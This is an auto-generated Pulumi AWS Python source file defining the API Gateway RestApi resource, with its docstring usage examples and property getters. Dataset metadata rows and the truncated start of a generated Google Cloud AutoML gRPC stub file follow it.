body: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disable_execute_api_endpoint: Optional[pulumi.Input[bool]] = None,
endpoint_configuration: Optional[pulumi.Input[pulumi.InputType['RestApiEndpointConfigurationArgs']]] = None,
minimum_compression_size: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
policy: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages an API Gateway REST API. The REST API can be configured via [importing an OpenAPI specification](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html) in the `body` argument (with other arguments serving as overrides) or via other provider resources to manage the resources (`apigateway.Resource` resource), methods (`apigateway.Method` resource), integrations (`apigateway.Integration` resource), etc. of the REST API. Once the REST API is configured, the `apigateway.Deployment` resource can be used along with the `apigateway.Stage` resource to publish the REST API.
> **Note:** Amazon API Gateway Version 1 resources are used for creating and deploying REST APIs. To create and deploy WebSocket and HTTP APIs, use Amazon API Gateway Version 2.
## Example Usage
### OpenAPI Specification
```python
import pulumi
import hashlib
import json
import pulumi_aws as aws
example_rest_api = aws.apigateway.RestApi("exampleRestApi",
body=json.dumps({
"openapi": "3.0.1",
"info": {
"title": "example",
"version": "1.0",
},
"paths": {
"/path1": {
"get": {
"x-amazon-apigateway-integration": {
"httpMethod": "GET",
"payloadFormatVersion": "1.0",
"type": "HTTP_PROXY",
"uri": "https://ip-ranges.amazonaws.com/ip-ranges.json",
},
},
},
},
}),
endpoint_configuration=aws.apigateway.RestApiEndpointConfigurationArgs(
types=["REGIONAL"],
))
example_deployment = aws.apigateway.Deployment("exampleDeployment",
rest_api=example_rest_api.id,
triggers={
"redeployment": example_rest_api.body.apply(lambda body: json.dumps(body)).apply(lambda to_json: hashlib.sha1(to_json.encode()).hexdigest()),
})
example_stage = aws.apigateway.Stage("exampleStage",
deployment=example_deployment.id,
rest_api=example_rest_api.id,
stage_name="example")
```
### Resources
```python
import pulumi
import hashlib
import json
import pulumi_aws as aws
example_rest_api = aws.apigateway.RestApi("exampleRestApi")
example_resource = aws.apigateway.Resource("exampleResource",
parent_id=example_rest_api.root_resource_id,
path_part="example",
rest_api=example_rest_api.id)
example_method = aws.apigateway.Method("exampleMethod",
authorization="NONE",
http_method="GET",
resource_id=example_resource.id,
rest_api=example_rest_api.id)
example_integration = aws.apigateway.Integration("exampleIntegration",
http_method=example_method.http_method,
resource_id=example_resource.id,
rest_api=example_rest_api.id,
type="MOCK")
example_deployment = aws.apigateway.Deployment("exampleDeployment",
rest_api=example_rest_api.id,
triggers={
"redeployment": pulumi.Output.all(example_resource.id, example_method.id, example_integration.id).apply(lambda exampleResourceId, exampleMethodId, exampleIntegrationId: json.dumps([
example_resource_id,
example_method_id,
example_integration_id,
])).apply(lambda to_json: hashlib.sha1(to_json.encode()).hexdigest()),
})
example_stage = aws.apigateway.Stage("exampleStage",
deployment=example_deployment.id,
rest_api=example_rest_api.id,
stage_name="example")
```
## Import
`aws_api_gateway_rest_api` can be imported by using the REST API ID, e.g.,
```sh
$ pulumi import aws:apigateway/restApi:RestApi example 12345abcde
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_key_source: Source of the API key for requests. Valid values are `HEADER` (default) and `AUTHORIZER`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-api-key-source` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-api-key-source.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[Sequence[pulumi.Input[str]]] binary_media_types: List of binary media types supported by the REST API. By default, the REST API supports only UTF-8-encoded text payloads. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-binary-media-types` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-binary-media-types.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[str] body: OpenAPI specification that defines the set of routes and integrations to create as part of the REST API. This configuration, and any updates to it, will replace all REST API configuration except values overridden in this resource configuration and other resource updates applied after this resource but before any `apigateway.Deployment` creation. More information about REST API OpenAPI support can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
:param pulumi.Input[str] description: Description of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.description` field. If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[bool] disable_execute_api_endpoint: Specifies whether clients can invoke your API by using the default execute-api endpoint. By default, clients can invoke your API with the default https://{api_id}.execute-api.{region}.amazonaws.com endpoint. To require that clients use a custom domain name to invoke your API, disable the default endpoint. Defaults to `false`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-endpoint-configuration` extension `disableExecuteApiEndpoint` property](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-endpoint-configuration.html). If the argument value is `true` and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[pulumi.InputType['RestApiEndpointConfigurationArgs']] endpoint_configuration: Configuration block defining API endpoint configuration including endpoint type. Defined below.
:param pulumi.Input[int] minimum_compression_size: Minimum response size to compress for the REST API. Integer between `-1` and `10485760` (10MB). Setting a value greater than `-1` will enable compression, `-1` disables compression (default). If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-minimum-compression-size` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-openapi-minimum-compression-size.html). If the argument value (_except_ `-1`) is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[str] name: Name of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.title` field. If the argument value is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of customizations for importing the specification in the `body` argument. For example, to exclude DocumentationParts from an imported API, set `ignore` equal to `documentation`. Additional documentation, including other parameters such as `basepath`, can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
:param pulumi.Input[str] policy: JSON formatted policy document that controls access to the API Gateway. This provider will only perform drift detection of its value when present in a configuration. It is recommended to use the `apigateway.RestApiPolicy` resource instead. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-policy` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/openapi-extensions-policy.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[RestApiArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an API Gateway REST API. The REST API can be configured via [importing an OpenAPI specification](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html) in the `body` argument (with other arguments serving as overrides) or via other provider resources to manage the resources (`apigateway.Resource` resource), methods (`apigateway.Method` resource), integrations (`apigateway.Integration` resource), etc. of the REST API. Once the REST API is configured, the `apigateway.Deployment` resource can be used along with the `apigateway.Stage` resource to publish the REST API.
> **Note:** Amazon API Gateway Version 1 resources are used for creating and deploying REST APIs. To create and deploy WebSocket and HTTP APIs, use Amazon API Gateway Version 2.
## Example Usage
### OpenAPI Specification
```python
import pulumi
import hashlib
import json
import pulumi_aws as aws
example_rest_api = aws.apigateway.RestApi("exampleRestApi",
body=json.dumps({
"openapi": "3.0.1",
"info": {
"title": "example",
"version": "1.0",
},
"paths": {
"/path1": {
"get": {
"x-amazon-apigateway-integration": {
"httpMethod": "GET",
"payloadFormatVersion": "1.0",
"type": "HTTP_PROXY",
"uri": "https://ip-ranges.amazonaws.com/ip-ranges.json",
},
},
},
},
}),
endpoint_configuration=aws.apigateway.RestApiEndpointConfigurationArgs(
types=["REGIONAL"],
))
example_deployment = aws.apigateway.Deployment("exampleDeployment",
rest_api=example_rest_api.id,
triggers={
"redeployment": example_rest_api.body.apply(lambda body: json.dumps(body)).apply(lambda to_json: hashlib.sha1(to_json.encode()).hexdigest()),
})
example_stage = aws.apigateway.Stage("exampleStage",
deployment=example_deployment.id,
rest_api=example_rest_api.id,
stage_name="example")
```
### Resources
```python
import pulumi
import hashlib
import json
import pulumi_aws as aws
example_rest_api = aws.apigateway.RestApi("exampleRestApi")
example_resource = aws.apigateway.Resource("exampleResource",
parent_id=example_rest_api.root_resource_id,
path_part="example",
rest_api=example_rest_api.id)
example_method = aws.apigateway.Method("exampleMethod",
authorization="NONE",
http_method="GET",
resource_id=example_resource.id,
rest_api=example_rest_api.id)
example_integration = aws.apigateway.Integration("exampleIntegration",
http_method=example_method.http_method,
resource_id=example_resource.id,
rest_api=example_rest_api.id,
type="MOCK")
example_deployment = aws.apigateway.Deployment("exampleDeployment",
rest_api=example_rest_api.id,
triggers={
"redeployment": pulumi.Output.all(example_resource.id, example_method.id, example_integration.id).apply(lambda exampleResourceId, exampleMethodId, exampleIntegrationId: json.dumps([
example_resource_id,
example_method_id,
example_integration_id,
])).apply(lambda to_json: hashlib.sha1(to_json.encode()).hexdigest()),
})
example_stage = aws.apigateway.Stage("exampleStage",
deployment=example_deployment.id,
rest_api=example_rest_api.id,
stage_name="example")
```
## Import
`aws_api_gateway_rest_api` can be imported by using the REST API ID, e.g.,
```sh
$ pulumi import aws:apigateway/restApi:RestApi example 12345abcde
```
:param str resource_name: The name of the resource.
:param RestApiArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RestApiArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_key_source: Optional[pulumi.Input[str]] = None,
binary_media_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
body: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disable_execute_api_endpoint: Optional[pulumi.Input[bool]] = None,
endpoint_configuration: Optional[pulumi.Input[pulumi.InputType['RestApiEndpointConfigurationArgs']]] = None,
minimum_compression_size: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
policy: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RestApiArgs.__new__(RestApiArgs)
__props__.__dict__["api_key_source"] = api_key_source
__props__.__dict__["binary_media_types"] = binary_media_types
__props__.__dict__["body"] = body
__props__.__dict__["description"] = description
__props__.__dict__["disable_execute_api_endpoint"] = disable_execute_api_endpoint
__props__.__dict__["endpoint_configuration"] = endpoint_configuration
__props__.__dict__["minimum_compression_size"] = minimum_compression_size
__props__.__dict__["name"] = name
__props__.__dict__["parameters"] = parameters
__props__.__dict__["policy"] = policy
__props__.__dict__["tags"] = tags
__props__.__dict__["arn"] = None
__props__.__dict__["created_date"] = None
__props__.__dict__["execution_arn"] = None
__props__.__dict__["root_resource_id"] = None
__props__.__dict__["tags_all"] = None
super(RestApi, __self__).__init__(
'aws:apigateway/restApi:RestApi',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api_key_source: Optional[pulumi.Input[str]] = None,
arn: Optional[pulumi.Input[str]] = None,
binary_media_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
body: Optional[pulumi.Input[str]] = None,
created_date: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disable_execute_api_endpoint: Optional[pulumi.Input[bool]] = None,
endpoint_configuration: Optional[pulumi.Input[pulumi.InputType['RestApiEndpointConfigurationArgs']]] = None,
execution_arn: Optional[pulumi.Input[str]] = None,
minimum_compression_size: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
policy: Optional[pulumi.Input[str]] = None,
root_resource_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'RestApi':
"""
Get an existing RestApi resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_key_source: Source of the API key for requests. Valid values are `HEADER` (default) and `AUTHORIZER`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-api-key-source` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-api-key-source.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN)
:param pulumi.Input[Sequence[pulumi.Input[str]]] binary_media_types: List of binary media types supported by the REST API. By default, the REST API supports only UTF-8-encoded text payloads. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-binary-media-types` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-binary-media-types.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[str] body: OpenAPI specification that defines the set of routes and integrations to create as part of the REST API. This configuration, and any updates to it, will replace all REST API configuration except values overridden in this resource configuration and other resource updates applied after this resource but before any `apigateway.Deployment` creation. More information about REST API OpenAPI support can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
:param pulumi.Input[str] created_date: The creation date of the REST API
:param pulumi.Input[str] description: Description of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.description` field. If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[bool] disable_execute_api_endpoint: Specifies whether clients can invoke your API by using the default execute-api endpoint. By default, clients can invoke your API with the default https://{api_id}.execute-api.{region}.amazonaws.com endpoint. To require that clients use a custom domain name to invoke your API, disable the default endpoint. Defaults to `false`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-endpoint-configuration` extension `disableExecuteApiEndpoint` property](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-endpoint-configuration.html). If the argument value is `true` and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[pulumi.InputType['RestApiEndpointConfigurationArgs']] endpoint_configuration: Configuration block defining API endpoint configuration including endpoint type. Defined below.
:param pulumi.Input[str] execution_arn: The execution ARN part to be used in `lambda_permission`'s `source_arn`
when allowing API Gateway to invoke a Lambda function,
e.g., `arn:aws:execute-api:eu-west-2:123456789012:z4675bid1j`, which can be concatenated with allowed stage, method and resource path.
:param pulumi.Input[int] minimum_compression_size: Minimum response size to compress for the REST API. Integer between `-1` and `10485760` (10MB). Setting a value greater than `-1` will enable compression, `-1` disables compression (default). If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-minimum-compression-size` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-openapi-minimum-compression-size.html). If the argument value (_except_ `-1`) is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[str] name: Name of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.title` field. If the argument value is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of customizations for importing the specification in the `body` argument. For example, to exclude DocumentationParts from an imported API, set `ignore` equal to `documentation`. Additional documentation, including other parameters such as `basepath`, can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
:param pulumi.Input[str] policy: JSON formatted policy document that controls access to the API Gateway. This provider will only perform drift detection of its value when present in a configuration. It is recommended to use the `apigateway.RestApiPolicy` resource instead. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-policy` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/openapi-extensions-policy.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[str] root_resource_id: The resource ID of the REST API's root
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider .
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RestApiState.__new__(_RestApiState)
__props__.__dict__["api_key_source"] = api_key_source
__props__.__dict__["arn"] = arn
__props__.__dict__["binary_media_types"] = binary_media_types
__props__.__dict__["body"] = body
__props__.__dict__["created_date"] = created_date
__props__.__dict__["description"] = description
__props__.__dict__["disable_execute_api_endpoint"] = disable_execute_api_endpoint
__props__.__dict__["endpoint_configuration"] = endpoint_configuration
__props__.__dict__["execution_arn"] = execution_arn
__props__.__dict__["minimum_compression_size"] = minimum_compression_size
__props__.__dict__["name"] = name
__props__.__dict__["parameters"] = parameters
__props__.__dict__["policy"] = policy
__props__.__dict__["root_resource_id"] = root_resource_id
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
return RestApi(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiKeySource")
def api_key_source(self) -> pulumi.Output[str]:
"""
Source of the API key for requests. Valid values are `HEADER` (default) and `AUTHORIZER`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-api-key-source` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-api-key-source.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "api_key_source")
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Name (ARN)
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="binaryMediaTypes")
def binary_media_types(self) -> pulumi.Output[Sequence[str]]:
"""
List of binary media types supported by the REST API. By default, the REST API supports only UTF-8-encoded text payloads. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-binary-media-types` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-binary-media-types.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "binary_media_types")
@property
@pulumi.getter
def body(self) -> pulumi.Output[Optional[str]]:
"""
OpenAPI specification that defines the set of routes and integrations to create as part of the REST API. This configuration, and any updates to it, will replace all REST API configuration except values overridden in this resource configuration and other resource updates applied after this resource but before any `apigateway.Deployment` creation. More information about REST API OpenAPI support can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
"""
return pulumi.get(self, "body")
@property
@pulumi.getter(name="createdDate")
def created_date(self) -> pulumi.Output[str]:
"""
The creation date of the REST API
"""
return pulumi.get(self, "created_date")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
Description of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.description` field. If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="disableExecuteApiEndpoint")
def disable_execute_api_endpoint(self) -> pulumi.Output[bool]:
"""
Specifies whether clients can invoke your API by using the default execute-api endpoint. By default, clients can invoke your API with the default https://{api_id}.execute-api.{region}.amazonaws.com endpoint. To require that clients use a custom domain name to invoke your API, disable the default endpoint. Defaults to `false`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-endpoint-configuration` extension `disableExecuteApiEndpoint` property](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-endpoint-configuration.html). If the argument value is `true` and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "disable_execute_api_endpoint")
@property
@pulumi.getter(name="endpointConfiguration")
def endpoint_configuration(self) -> pulumi.Output['outputs.RestApiEndpointConfiguration']:
"""
Configuration block defining API endpoint configuration including endpoint type. Defined below.
"""
return pulumi.get(self, "endpoint_configuration")
@property
@pulumi.getter(name="executionArn")
def execution_arn(self) -> pulumi.Output[str]:
"""
The execution ARN part to be used in `lambda_permission`'s `source_arn`
when allowing API Gateway to invoke a Lambda function,
e.g., `arn:aws:execute-api:eu-west-2:123456789012:z4675bid1j`, which can be concatenated with allowed stage, method and resource path.
"""
return pulumi.get(self, "execution_arn")
@property
@pulumi.getter(name="minimumCompressionSize")
def minimum_compression_size(self) -> pulumi.Output[Optional[int]]:
"""
Minimum response size to compress for the REST API. Integer between `-1` and `10485760` (10MB). Setting a value greater than `-1` will enable compression, `-1` disables compression (default). If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-minimum-compression-size` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-openapi-minimum-compression-size.html). If the argument value (_except_ `-1`) is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "minimum_compression_size")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.title` field. If the argument value is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def parameters(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Map of customizations for importing the specification in the `body` argument. For example, to exclude DocumentationParts from an imported API, set `ignore` equal to `documentation`. Additional documentation, including other parameters such as `basepath`, can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
"""
return pulumi.get(self, "parameters")
@property
@pulumi.getter
def policy(self) -> pulumi.Output[str]:
"""
JSON formatted policy document that controls access to the API Gateway. This provider will only perform drift detection of its value when present in a configuration. It is recommended to use the `apigateway.RestApiPolicy` resource instead. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-policy` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/openapi-extensions-policy.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "policy")
@property
@pulumi.getter(name="rootResourceId")
def root_resource_id(self) -> pulumi.Output[str]:
"""
The resource ID of the REST API's root
"""
return pulumi.get(self, "root_resource_id")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
"""
A map of tags assigned to the resource, including those inherited from the provider .
"""
return pulumi.get(self, "tags_all")
| 75.492616
| 819
| 0.710327
| 9,109
| 71,567
| 5.461522
| 0.039412
| 0.049086
| 0.038272
| 0.026975
| 0.960462
| 0.953708
| 0.944863
| 0.939456
| 0.938431
| 0.929124
| 0
| 0.003689
| 0.196906
| 71,567
| 947
| 820
| 75.572334
| 0.861888
| 0.630081
| 0
| 0.784017
| 1
| 0
| 0.107608
| 0.052081
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166307
| false
| 0.00216
| 0.015119
| 0
| 0.282937
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0aa6fa0747112aca48454556f6dd7125fd3870c7
| 259
|
py
|
Python
|
finally/__init__.py
|
insanj/finally
|
ef5bb17ca4444213ee6eb790fe85c8ea54a88879
|
[
"Apache-2.0"
] | null | null | null |
finally/__init__.py
|
insanj/finally
|
ef5bb17ca4444213ee6eb790fe85c8ea54a88879
|
[
"Apache-2.0"
] | null | null | null |
finally/__init__.py
|
insanj/finally
|
ef5bb17ca4444213ee6eb790fe85c8ea54a88879
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
from finally_file import *
from finally_flask import *
from finally_importer import *
from finally_parser import *
from finally_song import *
from finally_storage import *
from finally_storage_providers import *
from finally_helpers import *
| 28.777778
| 39
| 0.826255
| 36
| 259
| 5.694444
| 0.388889
| 0.429268
| 0.580488
| 0.234146
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123552
| 259
| 9
| 40
| 28.777778
| 0.903084
| 0.061776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ad90914659506e5cfc7cdfc810949f61da02ec3
| 21,842
|
py
|
Python
|
automl/google/cloud/automl_v1/proto/service_pb2_grpc.py
|
conwaychriscosmo/google-cloud-python
|
8e7b7f8a5f4bb04d13f4d88ec3848f017faf834a
|
[
"Apache-2.0"
] | 1
|
2019-03-26T21:44:51.000Z
|
2019-03-26T21:44:51.000Z
|
automl/google/cloud/automl_v1/proto/service_pb2_grpc.py
|
conwaychriscosmo/google-cloud-python
|
8e7b7f8a5f4bb04d13f4d88ec3848f017faf834a
|
[
"Apache-2.0"
] | 40
|
2019-07-16T10:04:48.000Z
|
2020-01-20T09:04:59.000Z
|
automl/google/cloud/automl_v1/proto/service_pb2_grpc.py
|
conwaychriscosmo/google-cloud-python
|
8e7b7f8a5f4bb04d13f4d88ec3848f017faf834a
|
[
"Apache-2.0"
] | 2
|
2019-07-18T00:05:31.000Z
|
2019-11-27T14:17:22.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.cloud.automl_v1.proto import (
annotation_spec_pb2 as google_dot_cloud_dot_automl__v1_dot_proto_dot_annotation__spec__pb2,
)
from google.cloud.automl_v1.proto import (
dataset_pb2 as google_dot_cloud_dot_automl__v1_dot_proto_dot_dataset__pb2,
)
from google.cloud.automl_v1.proto import (
model_evaluation_pb2 as google_dot_cloud_dot_automl__v1_dot_proto_dot_model__evaluation__pb2,
)
from google.cloud.automl_v1.proto import (
model_pb2 as google_dot_cloud_dot_automl__v1_dot_proto_dot_model__pb2,
)
from google.cloud.automl_v1.proto import (
service_pb2 as google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2,
)
from google.longrunning import (
operations_pb2 as google_dot_longrunning_dot_operations__pb2,
)
class AutoMlStub(object):
"""AutoML Server API.
The resource names are assigned by the server.
The server never reuses names that it has created after the resources with
those names are deleted.
An ID of a resource is the last element of the item's resource name. For
`projects/{project_id}/locations/{location_id}/datasets/{dataset_id}`, then
the id for the item is `{dataset_id}`.
Currently the only supported `location_id` is "us-central1".
On any input that is documented to expect a string parameter in
snake_case or kebab-case, either of those cases is accepted.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.CreateDataset = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/CreateDataset",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.CreateDatasetRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.GetDataset = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/GetDataset",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.GetDatasetRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_dataset__pb2.Dataset.FromString,
)
self.ListDatasets = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/ListDatasets",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ListDatasetsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.ListDatasetsResponse.FromString,
)
self.UpdateDataset = channel.unary_unary(
"/google.cloud.automl.v1.AutoMl/UpdateDataset",
request_serializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2.UpdateDatasetRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1_dot_proto_dot_dataset__pb2.Dataset.FromString,
)
self.DeleteDataset = channel.unary_unary(
